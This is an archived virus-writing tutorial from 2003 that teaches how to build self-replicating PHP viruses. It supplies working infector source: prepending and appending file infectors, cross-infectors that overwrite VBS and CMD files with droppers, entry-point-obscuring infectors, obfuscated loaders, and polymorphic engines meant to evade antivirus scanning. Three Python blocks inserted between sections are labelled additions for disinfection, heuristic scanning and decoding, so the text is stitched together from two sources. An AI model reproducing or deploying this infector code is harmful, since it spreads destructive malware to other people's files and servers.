VX Heaven
PHP Virus Writing Guide

SPTH
29a [7]
October 2003


Index

  1. Intro Words
  2. File infection
    1. Prepending
    2. Appending
    3. Cross Infection
      1. VBS infection
      2. JS infection
      3. CMD infection
    4. Entry Point Obscuring
      1. Include the virus after a command
      2. Using a function of the victim
  3. Encryption
    1. Changing virus to ASCII
    2. Using an internal decryption function
    3. Using a shifted character string
  4. Polymorphism
    1. Adding Trash
    2. Change Variable Names
    3. Number Changing
  5. Other Thoughts
    1. Find more files
    2. Changing the commands
  6. Last Words

0) Intro Words

PHP, short for 'Hypertext Preprocessor', is a very common scripting language for the world-wide web. You can do nearly everything internet-related with it, which also means you can write viruses in it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was written in October 2000 and released in 29A#5. It was not a real virus but rather a companion: it writes a line into every PHP file in the current directory which makes the victim run the virus, but the host itself does not contain the virus. After searching for material about PHP viruses I found that there is no high-tech PHP virus out so far, because all the viruses I could find are rips of PHP.Pirus (using the same principle). That was my inspiration for writing this article. I wanted to make something totally new, and I guess I succeeded. I tested every source with PHP 4.3.3, and everything worked fine. Now go on reading and learn something about PHP viruses! :)

1) File Infection

This is maybe the most important thing when you want to write a PHP virus, therefore I want to explain how you can infect files with PHP. It should be no problem to understand the examples, because I tried to make them as simple as possible. When this article was written (autumn 2003) there was no real file infector out there. The only interesting PHP virus so far is MaskBits' PHP.Pirus, which does not infect files but uses the command 'include' so that the virus is executed by every PHP file in the current directory. You may think 'Why does he tell me this?'. I don't know, just for fun :). Now let me explain how to infect files.

a) Prepending

A prepender copies its code in front of the victim's code, therefore it is executed before the victim. That is the main idea of this kind of infection. But there are some other important things you have to note: to get the virus out of the file, you need some information about where the virus is. In my example the virus uses the first 391 bytes. The next important thing is that you must not infect a file twice. What to do against that? Check whether the file is already infected. In the following example the virus searches the first 13 bytes (in an infected file this is the code '<?php // SPTH') for 'SPTH'. If it is found, the file won't be infected. OK, I think you understood. Now let's look at the PHP prepender virus example:

PHP Prepender Virus Example

<?php // SPTH
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.'); 
while ($file = readdir($curdir)) 
{ 
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    if (!strstr(fread($victim, 13), 'SPTH'))
    {
      rewind($victim);
      fwrite($victim, $string.fread($victim, filesize($file)););
    }
    fclose($victim);
  } 
}
closedir($curdir);
?>

As this is a really easy virus, you should understand it quickly just by looking at it. Now I'm going to give you the most important things the example does:

b) Appending

An appender is a virus which copies itself after the victim file. It is really easy to make one. You just have to search for the last PHP part (or simply put an infection mark at the beginning of the virus). Then you read until the end, and you have your virus file. The rest should be clear: search a victim, check that it is not infected yet and copy the virus body to the end of the file. I made an example for that, as you might expect. The exact explanation follows after the code.

PHP Appender Virus Example

<?php // SPTH
$string='<?php // '.strstr(fread(fopen(__FILE__,'r'), filesize(__FILE__)), 'SPTH');
$curdir=opendir('.');
while ($file = readdir($curdir)) 
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    if (!strstr(fread($victim, filesize($file)), 'SPTH'))
    {
      fwrite($victim, $string);
    }
    fclose($victim);
  } 
}
closedir($curdir); 
?>

I have already explained how the principle works. Now I'll explain my example:
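A defender's counterpart to the two infectors above, added here as an example that is not part of the original article: it recognises the '<?php // SPTH' marker both examples leave, tells a prepended copy from an appended one, and strips the virus block to recover the host. The host and the virus block used as input are constructed; the virus body is a stand-in comment, not the article's code.

```python
import os

# Infection marker that both the prepender and the appender example leave
# at the start of their own block.
MARKER = b"<?php // SPTH"


def classify(content: bytes) -> str:
    """'clean', 'prepended' (marker at offset 0) or 'appended' (marker later)."""
    if content.startswith(MARKER):
        return "prepended"
    if MARKER in content:
        return "appended"
    return "clean"


def disinfect(content: bytes) -> bytes:
    """Strip the virus block and return the host's own bytes.

    Prepended: the virus copies its whole source, one '<?php ... ?>' block,
    in front of the host, so everything up to and including the first '?>'
    and the line break after it belongs to the virus.
    Appended: the virus copies itself from its marker to end of file, so
    everything from the last marker onwards is dropped.
    Assumption: the host itself never contains the marker or an earlier '?>'.
    """
    kind = classify(content)
    if kind == "clean":
        return content
    if kind == "appended":
        return content[:content.rfind(MARKER)]
    end = content.find(b"?>")
    if end == -1:
        raise ValueError("prepended block has no closing tag")
    end += 2
    if content.startswith(b"\r\n", end):
        end += 2
    elif content.startswith(b"\n", end):
        end += 1
    return content[end:]


def scan_directory(path: str) -> dict:
    """Classify every .php file directly inside path (no recursion)."""
    results = {}
    for entry in os.scandir(path):
        if entry.is_file() and entry.name.lower().endswith(".php"):
            with open(entry.path, "rb") as fh:
                results[entry.name] = classify(fh.read())
    return results


# Constructed samples: a tiny host and a stand-in for the virus block.
HOST = b"<?php\r\necho 'hello from the host';\r\n?>\r\n"
VIRUS_BLOCK = MARKER + b"\r\n// (constructed stand-in for the virus body)\r\n?>\r\n"

if __name__ == "__main__":
    for name, sample in (("prepended", VIRUS_BLOCK + HOST), ("appended", HOST + VIRUS_BLOCK)):
        print(name, classify(sample), disinfect(sample) == HOST)
```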

c) Cross Infection

Cross infection means infecting more than one file extension. That is really useful, because the virus will spread much faster. That was my inspiration for writing this. I found some nice ways to infect other file formats, therefore I want to show them to you. The biggest problem while coding these things was that you can't execute a .php file directly, only through an internet browser. Fortunately Microsoft makes it very easy to open the Internet Explorer. :)

i) VBS infection

It is really easy to infect a .vbs file. The only important thing you have to watch out for when writing such a cross infector is that you must not use the character [" = chr(34)], because VBScript uses it for strings, and since our whole code becomes a string in the VBS file, there would be an error. Now look at the example and try to understand it (it shouldn't be too difficult, because I made it very easy to read).

Cross Infector - VBS

<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$vbscode='set fso=WScript.CreateObject('.chr(34).'Scripting.FileSystemObject'.chr(34).')'.chr(13).chr(10);
$vbscode.='set shell=WScript.CreateObject('.chr(34).'WScript.Shell'.chr(34).')'.chr(13).chr(10);
$vbscode.='set virus=fso.CreateTextFile('.chr(34).'index.htm'.chr(34).')'.chr(13).chr(10);
while ($string && $string!='?>')
{
  $vbscode.='virus.WriteLine('.chr(34).$string.chr(34).')'.chr(13).chr(10);
  $string=strtok(chr(13).chr(10));
}
$vbscode.='virus.WriteLine('.chr(34).'?';
$vbscode.='>'.chr(34).')'.chr(13).chr(10);
$vbscode.='virus.Close()'.chr(13).chr(10);
$vbscode.='shell.Run '.chr(34).'index.htm'.chr(34);
$directory=opendir('.');
while ($file = readdir($directory)) 
{ 
  if (strstr($file, '.vbs'))
  {
    fwrite(fopen($file, 'w'), $vbscode);
  }
}
closedir($directory);
?>

It should be totally easy to understand this example. Anyway, I'll give you the main ideas of the little code:

ii) JS infection

Infecting a JavaScript file is nearly the same as infecting a VBS file, therefore I won't give you an example. The reason is that we're using WScript in both VBS and JS. The only things you have to do are change 'set' to 'var' and '.vbs' to '.js', but I guess you knew that :D. I tried it, and it worked fine.

iii) CMD infection

This was the most difficult file extension I did for this article. The reason is easy to explain: CMD = batch for WinNT/2000/XP = DOS. And as you know, you are NOT allowed to use any '>', '<' or '&' in a DOS string. But I solved the problem, as you may imagine ;). I used the character codes in every string instead of the real characters. Then I had two more problems: the beginning and the end of the PHP code, where we MUST write '<' or '>'. So I thought about that, and suddenly an idea came to my mind: I'll use a JavaScript file to write the first and the last line to the .htm file. And since I have to use a script anyway to start the Internet Explorer (to run the PHP code; DOS can't open an internet browser), I used that file. The result of my coding is the following file :D. I'll explain the main ideas in more detail after the source.

Cross Infector - BAT

<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$string=strtok(chr(13).chr(10));
$cmdcode='cls'.chr(13).chr(10).'@echo off'.chr(13).chr(10).'del index.html'.chr(13).chr(10);
while ($string{0}!='?')
{
  $cmdcode.='echo '.$string.chr(62).chr(62).'index.html'.chr(13).chr(10);
  $string=strtok(chr(13).chr(10));
}
$cmdcode.='echo var fso=WScript.CreateObject("Scripting.FileSystemObject");'.chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo var shell=WScript.CreateObject("WScript.Shell");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo all=fso.OpenTextFile("index.html").ReadAll();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a=fso.OpenTextFile("index.html",2);'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Write(String.fromCharCode(60,63,112,104,112,13,10)+all+String.fromCharCode(13,10,63,62));'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Close();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo shell.Run("index.html");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='cscript file.js';

$directory=opendir('.');
while ($file = readdir($directory))
{ 
  if (strstr($file, '.cmd'))
  {
    fwrite(fopen($file, 'w'), $cmdcode);
  }
}
closedir($directory);
?>

Now the short explanation of the code:

d) Entry Point Obscuring

This is a really important technique in virus writing. Maybe some of you don't know what EPO exactly is, so I'll explain: an AV program searches in most cases at some static offsets for the virus (for instance at the beginning or at the end of the file). To fool them, we have to use a variable address for the virus, and not use any jump or call to the virus at a static address. How could we do this? I'll show you a short 'graphic'. At this point I want to thank SnakeByte for his Perl EPO article [released in 29a#6] for the idea of how to make an EPO virus in a script language. So, here is the graphic:

        [ part of the victim file ]
        information about the address
        read xxx lines of the virus
        open PHP file
            read yyy lines
            insert the virus
            read rest
        close PHP file
        [ rest of the victim file ]

Now we have another problem: where to include the virus code in the host file? SnakeByte did it by searching for ';', which is the end of a Perl command. As you might know, PHP statements also end with a ';'. Then I thought about another way, which could also be used, since that ';' technique could destroy the victim file. Then I got an idea: include the code into a function. What exactly I mean by this I'll show you after the ';' example.

i) Include the virus after a command

As I already told you, this idea comes from SnakeByte. To include a virus after a command, you have to search for a ';', which ends every PHP statement. That seems to be everything. Now let's have a look at the example for this EPO technique.

EPO virus - Type I

<?php
$ln=16;
$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);
fseek($filehandle, $ln);
$content=fread($filehandle, 987);
fclose($filehandle);
$curdir=opendir('.');
while ($file = readdir($curdir)) 
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    $vicont=fread($victim, filesize($file));
    if (!strstr($vicont, 'SPTH'))
    {
      $possible=0; $c=0;
      while($c<filesize($file))
      {
        if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $possible++;}
        $c++;
      }
      $which=rand(1,$possible); $c=0; $i=0;
      while($which)
      {
        if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $which--; }
        $c++;
      }
      rewind($victim);
      $a=fread($victim, $c); $b=fread($victim, filesize($file));
      fclose($victim);
      fwrite(fopen($file, 'w'), $a.chr(13).chr(10).'$ln='.$c.';'.chr(13).chr(10).$content.chr(13).chr(10).$b);
    }
  }
}
?>

This is an example of the EPO technique I described above. It is quite easy to understand; anyway, I'll tell you exactly how the virus works:

ii) Using a function of the victim

This technique is maybe a little bit better than the other one. In fact, I haven't seen this type of EPO in any script virus yet (ok, I haven't seen really many EPO script viruses :D). I already told you that the virus will use a function of the host file. But maybe you don't really understand what I mean, therefore I'll show you. Here you can see a non-infected file and an infected file. I hope that helps you get the point of the idea:

            Normal File:                   Infected File:
            _________________________      _________________________
           |       HOST-CODE-1       |    |        HOST-CODE-1      |
           |    call to function()   |    |    call to function()   |
           |       HOST-CODE-2       |    |        HOST-CODE-2      |
           |        function()       |    |        function()       |
           |       HOST-CODE-3       |    |      < < VIRUS > >      |
           |     end  function       |    |   call to real function |
           |       HOST-CODE-4       |    |      end  function      |
           |_________________________|    |        HOST-CODE-4      |
                                          |      real function      |
                                          |        HOST-CODE-3      |
                                          |     end real function   |
                                          |_________________________|

Now you should understand what I mean, but how to manage this? First you have to search for every function in the code, then you pick one of them, save the victim's function code and copy the virus code into the function. After the virus code you need a call to the real function, which you add at the end of the file. The name of the real function is no problem, since only your code calls it. Now I also made an example for this technique, as you may imagine. Look at it and try to understand it. The technical description follows after the code:

EPO virus - Type II

<?php
$ln=16;
$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);
fseek($filehandle, $ln);
$content=fread($filehandle, 1611);
fclose($filehandle);
$curdir=opendir('.');
while ($file = readdir($curdir)) 
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    $vicont=fread($victim, filesize($file));
    if (!strstr($vicont, 'SPTH'))
    {
      $possible=0; $viccont=$vicont;
      while(strstr($viccont, 'function '))
      {
        $viccont=strstr($viccont, 'unction ');
	$possible++; 
      }
      $which=rand(1,$possible);
      $viccont=$vicont;
      while($which--)
      {
        $viccont=strstr($viccont, 'function ');
      }
      $viccont=strstr($viccont, '{');
      $before=strlen($vicont)-strlen($viccont)+1; $check=0; $i=0;
      do
      {
        if ($viccont{$i}=='{') { $check++; }
	if ($viccont{$i++}=='}') { $check--; }
      }
      while($check);
      fseek($victim, $before);
      $funccont=fread($victim, $i+1);
      fseek($victim, $before+$i-1);
      $aftercont=fread($victim, filesize($file)-$before-$i-strlen(strstr($vicont, '?>')));
      $coundj=0; $newvar='';
      do
      {
        $newvar.=chr(rand(97,122)); $countj++;
      } 
      while ($countj<rand(5,15));
      rewind($victim);
      $beforecont=fread($victim, $before);
      rewind($victim);
      fwrite($victim, $beforecont.chr(13).chr(10).'$ln='.($before+strlen($before)+9).';'.chr(13).chr(10).$content.chr(13).chr(10).$newvar.'(); }'.$aftercont.chr(13).chr(10).'function '.$newvar.'() {'.chr(13).chr(10).$funccont.'?'.'>');
    }
  }
}
?>

To understand this code, you must not be a beginner. :) I worked about 4-5 hours on this little thing. Anyway, it works really fine and I want to tell you how it works:
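A heuristic scanner for the behaviours the file infectors, the cross infectors and both EPO examples in this section share (reading their own source via __FILE__, walking the directory, filtering victims by extension, opening other files for writing, keeping an offset in $ln, building a dropper that launches a file). It is an added example, not code from the article; the indicator weights and threshold are my own assumption, and both sample scripts are constructed, the second being an inert skeleton with the infection logic left out.

```python
import re

# Indicators drawn from the infector examples above. Weights and the
# threshold are an assumption of this example, not the article's.
INDICATORS = [
    ("reads its own source", re.compile(r"fopen\s*\(\s*__FILE__"), 3),
    ("walks the current directory", re.compile(r"\breaddir\s*\("), 1),
    ("filters victims by script extension",
     re.compile(r"strstr\s*\(\s*\$\w+\s*,\s*'\.(?:php|vbs|js|cmd)'\s*\)"), 2),
    ("opens another file for writing",
     re.compile(r"fopen\s*\(\s*\$\w+\s*,\s*'(?:w|r\+|w\+)'\s*\)"), 2),
    ("stores an EPO offset", re.compile(r"\$ln\s*=\s*\d+\s*;"), 2),
    ("seeks to the stored offset", re.compile(r"fseek\s*\(\s*\$\w+\s*,\s*\$ln\s*\)"), 2),
    ("carries the infection marker", re.compile(r"<\?php\s*//\s*SPTH"), 3),
    ("builds a dropper that launches a file",
     re.compile(r"shell\.Run|cscript\s+\S+\.js|WScript\.Shell"), 2),
]
THRESHOLD = 6


def scan_source(src: str) -> dict:
    """Score one PHP source text and list the indicators that fired."""
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(src)]
    score = sum(weight for _, weight in hits)
    return {
        "score": score,
        "hits": [name for name, _ in hits],
        "suspicious": score >= THRESHOLD,
    }


# Constructed sample 1: a harmless housekeeping script that also walks the
# directory, showing that a single indicator does not trip the verdict.
BENIGN = r"""<?php
$d = opendir('.');
while ($f = readdir($d)) {
  if (strstr($f, '.log')) { copy($f, 'backup/' . $f); }
}
closedir($d);
?>"""

# Constructed sample 2: the skeleton of the EPO infector (reads itself from
# a stored offset, looks for .php victims, opens them read-write) with the
# actual infection logic deliberately absent.
SKELETON = r"""<?php
$ln=16;
$fh=fopen(__FILE__,'r');
fseek($fh, $ln);
$body=fread($fh, 512);
$d=opendir('.');
while ($f = readdir($d)) {
  if (strstr($f, '.php')) { $v=fopen($f, 'r+'); fclose($v); }
}
closedir($d);
?>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("skeleton", SKELETON)):
        print(label, scan_source(sample))
```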

2) Encryption

The first part of the article should have given you the idea of how to write a successful virus in PHP. But more or less, these techniques are easy to detect for anti-virus companies. Therefore I also want to show you how to fool them. This part (and of course the next one: polymorphism) should help you write a PHP virus which cannot be detected by a simple string scan, or at least reduce the usable scan strings. I found many different ways to encrypt a PHP string, and of course I want to tell you about them :)

a) Changing virus to ASCII

Turning the whole virus into character codes should not be a big problem. To execute the code in this form I first thought of 'eval()'. But after 2 hours of testing I saw that it doesn't work. So I had to think of another way: write the virus code (built from ASCII codes) to a new file, run the file via 'include()', and delete it. I made an example which shows how you may use the technique:

Encryption Example - Type I

<?php
$content=chr(60).chr(63).chr(112).chr(104).chr(112).chr(13).chr(10).chr(112).chr(114).chr(105).
         chr(110).chr(116).chr(40).chr(34).chr(72).chr(105).chr(32).chr(86).chr(88).chr(101).
         chr(114).chr(33).chr(32).chr(84).chr(104).chr(105).chr(115).chr(32).chr(105).chr(115).
         chr(32).chr(106).chr(117).chr(115).chr(116).chr(32).chr(97).chr(32).chr(115).chr(105).
         chr(108).chr(108).chr(121).chr(32).chr(116).chr(101).chr(115).chr(116).chr(32).chr(115).
         chr(116).chr(114).chr(105).chr(110).chr(103).chr(32).chr(102).chr(111).chr(114).chr(32).
         chr(116).chr(104).chr(101).chr(32).chr(101).chr(110).chr(99).chr(114).chr(121).chr(112).
         chr(116).chr(105).chr(111).chr(110).chr(32).chr(105).chr(110).chr(32).chr(80).chr(72).
         chr(80).chr(46).chr(34).chr(41).chr(59).chr(13).chr(10).chr(63).chr(62);
copy(__FILE__,'file.php');
$a=fopen('file.php','w+');
fwrite($a, $content);
fclose($a);
include('file.php');
unlink('file.php');
?>

You should understand the principle of the code really fast. The encrypted code contains a 'secret' message. :) I'll show you how it works, if you haven't understood it so far:

b) Using an internal decryption function

This headline sounds strange. Well, it isn't :). The basic idea is this: you call a function with 3 values and get the right character back. The idea isn't hard to understand. I used the same principle as in the last example. The only difference is the encryption: now I use a function call instead of a real character. But because the function calculates the right character and returns it, that is no problem. I hope you understand it. Now let's have a look at my example for this technique:

Encryption Example - Type II

<?php
$content=cr(-177,237,1).cr(169,106,2).cr(-135,247,1).cr(150,46,2).cr(8624,77,3).cr(56,43,2).
         cr(1900,190,3).cr(127,15,2).cr(20,94,1).cr(51,54,1).cr(110,0,2).cr(372,256,2).
         cr(247,207,2).cr(57,18,2).cr(-1,84,1).cr(322,221,2).cr(147,48,2).cr(232,121,2).
         cr(7700,70,3).cr(-33,133,1).cr(-31,63,1).cr(180,97,2).cr(-106,207,1).cr(-148,247,1).
         cr(184,70,2).cr(322,221,2).cr(-48,164,1).cr(167,135,2).cr(-71,148,1).cr(24947,247,3).
         cr(10810,94,3).cr(202,87,2).cr(4559,47,3).cr(261,158,2).cr(312,211,2).cr(-79,111,1).
         cr(-3,61,1).cr(-5,73,1).cr(2262,58,3).cr(56,15,2).cr(-145,204,1).cr(3289,253,3).
         cr(225,215,2).cr(21,42,1).cr(302,240,2);
copy(__FILE__,'file.php');
$aa=fopen('file.php','w+');
fwrite($aa, $content);
fclose($aa);
include('file.php');
unlink('file.php');

function cr($a,$b,$c)
{
  if ($c==1) { return(chr($a+$b)); }
  if ($c==2) { return(chr($a-$b)); }
  if ($c==3) { return(chr($a/$b)); }
}
?>

Well, you should have understood what I meant when you looked at the code. I'll show you exactly what it does. The encrypted code is a secret message again :)

c) Using a shifted character string

This technique is a well-known one in script languages. For instance jackie did it in JavaScript. Therefore I thought it should also be possible in PHP. And as you can see, it was. The technique works as follows: the (virus) code is encrypted in a variable. It is encrypted by adding 3 (the key) to the ASCII code of every character. Should be easy to understand. Now let's look at the example I made:

Encryption Example - Type III

<?php
$all='?Bskssulqw+*111frro/#wklv#lv#wkh#wklug#hqfu|swlrq#whfkqltxh#dqg#|rx#duh#vwloo#zlwk#ph111#=,*,>BA';
$i=0; $content='';
while($i<strlen($all)) { $content.=chr(ord($all{$i++})-3); }
copy(__FILE__,'file.php');
$aa=fopen('file.php','w+');
fwrite($aa, $content);
fclose($aa);
include('file.php');
unlink('file.php');
?>

The encrypted variable content contains the code of a PHP file that writes a message to the screen. The rest works as always: make a new file, overwrite it with the decrypted code, execute the file, and delete it. How the en/decryption works I'll show you:
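What an analyst does with the three encodings in this part: statically decode the chr() chain, the cr() call chain and the shift-by-3 string to recover the dropped PHP block without ever running the sample. This is an added example, not the article's code; php_cr() re-implements the cr() helper shown in Example II, and the three samples are the encoded strings copied from the examples above.

```python
import re

CHR_CALL = re.compile(r"\bchr\(\s*(-?\d+)\s*\)")
CR_CALL = re.compile(r"\bcr\(\s*(-?\d+)\s*,\s*(-?\d+)\s*,\s*([123])\s*\)")


def php_cr(a: int, b: int, c: int) -> str:
    """Re-implementation of cr() from Example II: mode 1 adds, mode 2
    subtracts, mode 3 divides; the result is taken as a character code."""
    if c == 1:
        return chr(a + b)
    if c == 2:
        return chr(a - b)
    return chr(a // b)


def decode_chr_chain(expr: str) -> str:
    """Join every chr(N) found in a PHP expression (Example I)."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(expr))


def decode_cr_chain(expr: str) -> str:
    """Join every cr(a,b,c) found in a PHP expression (Example II)."""
    return "".join(php_cr(int(a), int(b), int(c)) for a, b, c in CR_CALL.findall(expr))


def decode_shifted(text: str, key: int = 3) -> str:
    """Undo the per-character ASCII shift of Example III (key 3 on the page)."""
    return "".join(chr(ord(ch) - key) for ch in text)


def find_embedded_php(src: str) -> list:
    """Run every decoder over a source text and keep whatever decodes to a
    PHP block, which is what the write-include-unlink loader needs."""
    found = []
    for name, fn in (("chr", decode_chr_chain), ("cr", decode_cr_chain)):
        out = fn(src)
        if out.startswith("<?php"):
            found.append((name, out))
    for literal in re.findall(r"'([^']*)'", src):
        out = decode_shifted(literal)
        if out.startswith("<?php"):
            found.append(("shift", out))
    return found


# The encoded payloads of Examples I, II and III, copied from the article.
SAMPLE_I = """chr(60).chr(63).chr(112).chr(104).chr(112).chr(13).chr(10).chr(112).chr(114).chr(105).
chr(110).chr(116).chr(40).chr(34).chr(72).chr(105).chr(32).chr(86).chr(88).chr(101).
chr(114).chr(33).chr(32).chr(84).chr(104).chr(105).chr(115).chr(32).chr(105).chr(115).
chr(32).chr(106).chr(117).chr(115).chr(116).chr(32).chr(97).chr(32).chr(115).chr(105).
chr(108).chr(108).chr(121).chr(32).chr(116).chr(101).chr(115).chr(116).chr(32).chr(115).
chr(116).chr(114).chr(105).chr(110).chr(103).chr(32).chr(102).chr(111).chr(114).chr(32).
chr(116).chr(104).chr(101).chr(32).chr(101).chr(110).chr(99).chr(114).chr(121).chr(112).
chr(116).chr(105).chr(111).chr(110).chr(32).chr(105).chr(110).chr(32).chr(80).chr(72).
chr(80).chr(46).chr(34).chr(41).chr(59).chr(13).chr(10).chr(63).chr(62)"""
SAMPLE_II = """cr(-177,237,1).cr(169,106,2).cr(-135,247,1).cr(150,46,2).cr(8624,77,3).cr(56,43,2).
cr(1900,190,3).cr(127,15,2).cr(20,94,1).cr(51,54,1).cr(110,0,2).cr(372,256,2).
cr(247,207,2).cr(57,18,2).cr(-1,84,1).cr(322,221,2).cr(147,48,2).cr(232,121,2).
cr(7700,70,3).cr(-33,133,1).cr(-31,63,1).cr(180,97,2).cr(-106,207,1).cr(-148,247,1).
cr(184,70,2).cr(322,221,2).cr(-48,164,1).cr(167,135,2).cr(-71,148,1).cr(24947,247,3).
cr(10810,94,3).cr(202,87,2).cr(4559,47,3).cr(261,158,2).cr(312,211,2).cr(-79,111,1).
cr(-3,61,1).cr(-5,73,1).cr(2262,58,3).cr(56,15,2).cr(-145,204,1).cr(3289,253,3).
cr(225,215,2).cr(21,42,1).cr(302,240,2)"""
SAMPLE_III = "?Bskssulqw+*111frro/#wklv#lv#wkh#wklug#hqfu|swlrq#whfkqltxh#dqg#|rx#duh#vwloo#zlwk#ph111#=,*,>BA"

if __name__ == "__main__":
    print(repr(decode_chr_chain(SAMPLE_I)))
    print(repr(decode_cr_chain(SAMPLE_II)))
    print(repr(decode_shifted(SAMPLE_III)))
```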

3) Polymorphism

As everybody knows, this is one of the most important techniques to fool AVs and to show that you know what you're doing :). So I decided to also write something about this technique here. In fact, I've never seen any other poly PHP virus around the world (maybe one exists anyway). It was really easy for me to write some poly engines, because PHP isn't a really difficult language. I tried my best to show you how a PHP poly engine could work.

a) Adding Trash

This technique is well known in many script languages. Therefore I thought it should also be possible in PHP. Then I sat down and began to write. About 2 hours later (with smoking breaks, sure :D) I had the finished code. First I want to tell you what kind of trash/junk/garbage I included in my example:

Well, now we know what to include. Anything else to do? Sure, we have to delete the trash again, otherwise the file would be 2MB after the 10th time you run it, and I think you don't want that. :) So, how to delete trash? In my example I look at the first letter of a line and check whether it is a '/' or a '$'. If yes, it's trash and we don't include it in our new code. It seems I explained everything. Now let's have a look at the code:

Adding Trash example

<?php
 $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
 $newcont='<?php'.chr(13).chr(10);
srand((double)microtime()*1000000);
while ($string && $string!='?>') {
  if(rand(0,1)) {
    if (rand(0,1)) { $newcont.='// '.trash('').chr(13).chr(10); }
    if (rand(0,1)) { $newcont.='$'.trash('').'='.chr(39).trash('').chr(39).';'.chr(13).chr(10); }
    if (rand(0,1)) { $newcont.='$'.trash('').'='.rand().';'.chr(13).chr(10); }
  }
  $string=strtok(chr(13).chr(10));
  if ($string{0}!='/' && $string{0}!='$') { $newcont.=$string.chr(13).chr(10); }
  fwrite(fopen(__FILE__, 'w'),$newcont);
}

function trash($var) {
  do { $var.=chr(rand(97,122)); } while (rand(0,7));
  return $var;
}
?>

Everything should be clear now; anyway, I'll tell you the most important things in this code snippet:

b) Variable Changing

This is another well-known script technique to morph the virus, so I did it again in PHP. Let me explain the technique. You're using many variables in a virus, and if the variables have the same name in every generation, our friends the AV guys are able to use this fact to detect the virus. So it could be of much value to change the variable names. How did I do it? I used an array with all the variables I'm using. Then I searched for every value from the array in the virus file (i.e. I searched for every variable) and replaced it via the command 'str_replace' with a new one, which I got from my 'trash' function. Now let's look at the source of the example:

Variable changing example

<?php
$changevars=array('changevars', 'content', 'newvars', 'counti','countj', 'trash');
srand((double)microtime()*1000000);
$content=fread(fopen(__FILE__,'r'),filesize(__FILE__));
$counti=0;
while($changevars[$counti]) {
  $content=str_replace($changevars[++$counti], trash('',0), $content);
}
fwrite(fopen(__FILE__,'w'),$content);

function trash($newvar, $countj) {
  do { $newvar.=chr(rand(97,122)); } while (++$countj<rand(5,15));
  return $newvar;
}
?>

Easy code, easy to understand. Anyway, let me tell you exactly how it works:

c) Number Changing

Every piece of code contains some numbers, whatever those numbers do. After thinking a little bit I found out that I can change the numbers too. So I decided to make a PHP code which changes the numbers in its own code. How can we change a number, you may ask? It's really easy: you make a calculation with that number which returns the number you want. Let's have a look at the possible variants:

I also tried to use division, but that gives fractional numbers, which don't really work. But it's no problem, there are enough variants with just 3 calculation types. Now I'll show you how a number could look after the 4th morphing:

10=((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5))))

Now I hope you see the damn cool results of this technique :) After explaining the main thing, I'll show you the little code which changes the numbers.

Number Changing example

<?php
$newcont=fread(fopen(__FILE__,'r'),filesize(__FILE__));
srand((double)microtime()*1000000);
$count=-1; $number='';
while(++$count<strlen($newcont)) {
  if (ord($newcont{$count})>47 && ord($newcont{$count})<58) {
    $number=$newcont{$count};
    while(ord($newcont{++$count})>47 && ord($newcont{$count})<58) { $number.=$newcont{$count}; }
    $remn=rand(1,10);
    switch(rand(1,3)) {
      case 1:
        $cont.='('.($number-$remn).'+'.$remn.')'; break;
      case 2:
        $cont.='('.($number+$remn).'-'.$remn.')'; break;
      case 3:
        $cont.='('.($number*$remn).'/'.$remn.')'; break;
    }
  }
  $cont.=$newcont{$count};
  $number='';
}
fwrite(fopen(__FILE__,'w'),$cont);
?>

Now a short explanation of the code:

4) Other thoughts

When I wrote this article, some other ideas came to my mind, therefore I also want to give these ideas to you. Maybe some of the ideas are just nonsense, or others are brilliant (I don't think so, but wonders happen :D). OK, let's start: this part contains ideas for hiding better so as not to get detected, or for spreading faster. I hope you also like reading this!

a) Find more files

What must we do if we want to find more files? Search in more directories. :) My idea is this: since the command 'getcwd()' returns the current directory, we are also able to infect every directory above it. How to do this? Look at the return value of 'getcwd()':

E:\SPTH\Programme\minixampp\htdocs

Now we have 4 directories which aren't infected so far:

          ~~ E:\SPTH\Programme\minixampp
          ~~ E:\SPTH\Programme
          ~~ E:\SPTH
          ~~ E:\

And how to get the directories? Just search for a '\' in the current dir: delete character by character from the end until you reach a '\'. Then you have the directory name. The rest is easy: open it via 'opendir()' and do the same as I explained above :)

b) Changing the commands

Maybe you already know it, but PHP contains tons of aliases for different commands, and we can use that. I'm sure you know how :) Just replace one command with another which does the same. I made a list of commands and their aliases to show you how much we are able to change. This is just a short list; nevertheless it could be useful when you want to make such a polymorphic virus.

         chop                   -     rtrim()
         close                  -     closedir()
         die                    -     exit()
         dir                    -     getdir()
         doubleval              -     floatval()
         fputs                  -     fwrite()
         ini_alter              -     ini_set()
         is_double              -     is_float()
         is_integer             -     is_int()
         is_long                -     is_int()
         is_real                -     is_float()
         is_writeable           -     is_writable()
         join                   -     implode()
         magic_quotes_runtime   -     set_magic_quotes_runtime() 
         pos                    -     current()
         rewind                 -     rewinddir()
         show_source            -     highlight_file()
         sizeof                 -     count()
         strchr                 -     strstr()

Get the full list of aliases here: http://zend.com/phpfunc/all_aliases.php
